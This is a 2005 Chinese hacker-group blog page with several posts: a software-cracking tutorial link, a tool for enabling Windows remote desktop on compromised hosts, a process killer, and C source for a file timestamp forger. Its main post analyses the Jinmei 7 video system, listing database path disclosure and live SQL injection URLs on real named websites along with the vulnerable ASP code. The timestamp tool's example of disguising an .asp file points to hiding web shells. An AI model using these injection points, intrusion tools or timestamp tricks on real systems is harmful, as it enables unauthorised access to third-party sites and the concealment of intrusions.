关于作者

用户名:zhouzhen
笔名:zhouzhen
地区:
行业:其他

日历  

快速登录

+ 用户名:
+ 密 码:

在线留言



Hacker site

Program

Linux

访问统计:
文章个数:95
评论个数:72
留言条数:7




Powered by BlogDriver 2.1

zhouzhen weblog

 

高手是一种境界,黑客是一种精神,安全是一项事业.

文章

新blog

- 作者: zhouzhen 2005年09月19日, 星期一 15:25  回复(0) |  引用(1) 加入博采

[原创]按键精灵2.65正式版脱壳到破解一条龙

文章作者:zhouzhen [E.S.T]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

注意:本文章已经在《黑客X档案》上发表 如要转载 请注明作者并且保证文章的完整性

上传pdf格式文件:

http://zhouzhen.blogchina.com/inc/%B0%B4%BC%FC%BE%AB%C1%E92.65%D5%FD%CA%BD%B0%E6%CD%D1%BF%C7%B5%BD%C6%C6%BD%E2%D2%BB%CC%F5%C1%FA.pdf

- 作者: zhouzhen 2005年07月5日, 星期二 14:59  回复(0) |  引用(1) 加入博采

[原创]通用的开3389的小工具
文章作者:zhouzhen [E.S.T]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

开3389的小工具.在windows 2000 , windows xp , windows 2003 下测试通过.
体积也不大 17 k 方便上传

注:运行时需要一定的权限



附件: 3389.rar (16 K)

- 作者: zhouzhen 2005年07月5日, 星期二 14:39  回复(0) |  引用(1) 加入博采

[原创]金梅七程序漏洞分析

文章作者:zhouzhen [E.S.T]
信息来源:邪恶八进制安全小组

金梅系统的安全性一直不是很好,昨天朋友说金梅已经到第七版了,呵呵,拿到程序后就想看看安全性。官方网站地址:
http://www.yule21.com/   程序演示地址:http://www.yule21.com/vod7/
由于官方网站作了特殊处理,有的效果不明显,外加了个网站作例子:http://www.yt263.com/vod/

1.articleconn.asp 暴库

articleconn.asp

没有加上ON ERROR RESUME NEXT 容错语句,%5c暴库。http://www.yt263.com/vod%5cclass.asp?typeid=喜剧片 返回出错信息:

Microsoft VBScript 编译器错误 错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 错误 '80004005'

找不到文件 'O:\网站备份1\方联\data\admin2002.asp'。

/vod/articleconn.asp,行10

官方网站出错是作了页面重定向看不出效果。

2. user 目录下conn.asp 暴库

http://www.yt263.com/vod%5cmylook.ASP 暴库。返回出错信息。

Microsoft VBScript 编译器错误 错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 错误 '80004005'

找不到文件 'O:\网站备份1\方联\data\admin2002.asp'。

/vod/articleconn.asp,行10


3. down.asp 注入漏洞

down.asp 关键代码

<% Response.Expires=0
   dim sql
   dim rs
   articleid=request("id2")
   urlid=request("id1")
   if articleid="" or urlid="" then
   response.write"非法操作"
   response.end
   end if
set rs=server.createobject("adodb.recordset")
   sql="select mhit,serverip,canlook,movietype,title from learning where articleid="&articleid
   rs.open sql,conn,1,1
   mhit=rs("mhit")

很明显id2没过滤,可注入。官方网站的注入点之一:http://www.yule21.com/vod7/down.asp?id1=633&id2=254


4. ud2t3d86.asp 注入漏洞

ud2t3d86.asp 关键代码

<% Response.Expires=0
   dim sql
   dim rs
   articleid=request("film2")
   urlid=request("film1")
   if articleid="" or urlid="" then
   response.write"非法操作"
   response.end
   end if

set rs=server.createobject("adodb.recordset")
   sql="select mhit,serverip,canlook,movietype,title from learning where articleid="&articleid

film2 没过滤,所以 look.asp 注入 http://www.yule21.com/vod7/ud2t3d86.asp?film1=10&film2=10 官方网站注入点之二。

5. look.asp

因为look.asp 是向ud2t3d86.asp传film1 和 film2 的参数。因此 look.asp 可注入

随便检查了一下就发现那么多的漏洞,我并没有看全部的代码,其它漏洞仍然可能存在,大家可以继续交流。

- 作者: zhouzhen 2005年04月27日, 星期三 16:44  回复(1) |  引用(1) 加入博采

已锁定
摘要:脚本编程 查看全文

- 作者: zhouzhen 2005年04月27日, 星期三 16:35  回复(0) |  引用(1) 加入博采

[原创]枚举远程主机的用户 nasl 脚本
摘要:枚举远程主机用户 smb 查看全文

- 作者: zhouzhen 2005年04月27日, 星期三 16:28  回复(0) |  引用(1) 加入博采

[原创]自己写的枚举进程和杀进程的小工具

文章作者: zhouzhen[E.S.T]
信息来源: 邪恶八进制中国 http://www.eviloctal.com/forum

process list & process kill
http://zhouzhen.blogchina.com

Usage: ps.exe <OPTION>
Example: ps.exe -l
      ps.exe -k pid
Code by zhouzhen

ProcessName     ProcessID
[System Process]       0
System                     8
smss.exe                148
csrss.exe                172
WINLOGON.EXE       192
services.exe            220
LSASS.EXE             232
svchost.exe            412
SPOOLSV.EXE         440
svchost.exe            476

C:\Documents and Settings\Administrator>ps -k 1292

[+]SetPrivilege ok!
[+]process 1292 has been killed!

kill process Code by zhouzhen

可以杀系统进程 :)

附件 ps.rar:http://blog.blogchina.com/upload/2005-03-16/20050316114452788483.rar




- 作者: zhouzhen 2005年03月16日, 星期三 11:45  回复(0) |  引用(1) 加入博采

【原创】文件时间修改器源码

// setTime.cpp : Defines the entry point for the console application.
//

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

void usage()
{
       system("cls.exe");
       printf("-------------------------------------------------------\n"
                 "\tsetTime Ver 1.0  zhouzhen[E.S.T], 2005/3/5\n"
                 "\thttp://www.eviloctal.com, [emal]zhouzhen@yeah.net[/email]\n"
              "\t        文件时间修改器 1.0"
                 "\n\n"
                 "\tUsage:   \tsetTime OldFile NewFile\n"
                 "\tExample: \tsetTime hello.asp eviloctal.asp\n"
                 "--------------------------------------------------------\n"
                 );
       exit(0);
}

int main(int argc, char* argv[])
{
       HANDLE hFileOld, hFileNew;
       FILETIME OCreateTime, OLastAccessTime, OLastWriteTime;
       const FILETIME *pCreationTime, *pLastAccessTime, *pLastWriteTime;

              if (argc!=3)
              usage();
       else{

              hFileOld = CreateFile(argv[1], GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
              if (hFileOld == INVALID_HANDLE_VALUE)
              {
                     printf("Cannot open %s. Error:%x\n", argv[1], GetLastError());
                     exit(1);
                    
              }

              hFileNew = CreateFile(argv[2], GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
              if (hFileNew == INVALID_HANDLE_VALUE)
              {
                     printf("Cannot open %s. Error:%x\n", argv[2], GetLastError());
                     exit(2);
                    
              }

              GetFileTime(hFileOld , &OCreateTime, &OLastAccessTime, &OLastWriteTime);
      
       
              pCreationTime = &OCreateTime;
        pLastAccessTime = &OLastAccessTime;
        pLastWriteTime = &OLastWriteTime;
             
              SetFileTime(hFileNew, pCreationTime, pLastAccessTime,pLastWriteTime);

             
              CloseHandle(hFileNew);
              CloseHandle(hFileOld);

              printf("All is done! Enjoy yourself\n");

 

       }
       return 0;
}

PS: 呵呵,支持开源。。


- 作者: zhouzhen 2005年03月11日, 星期五 11:12  回复(0) |  引用(1) 加入博采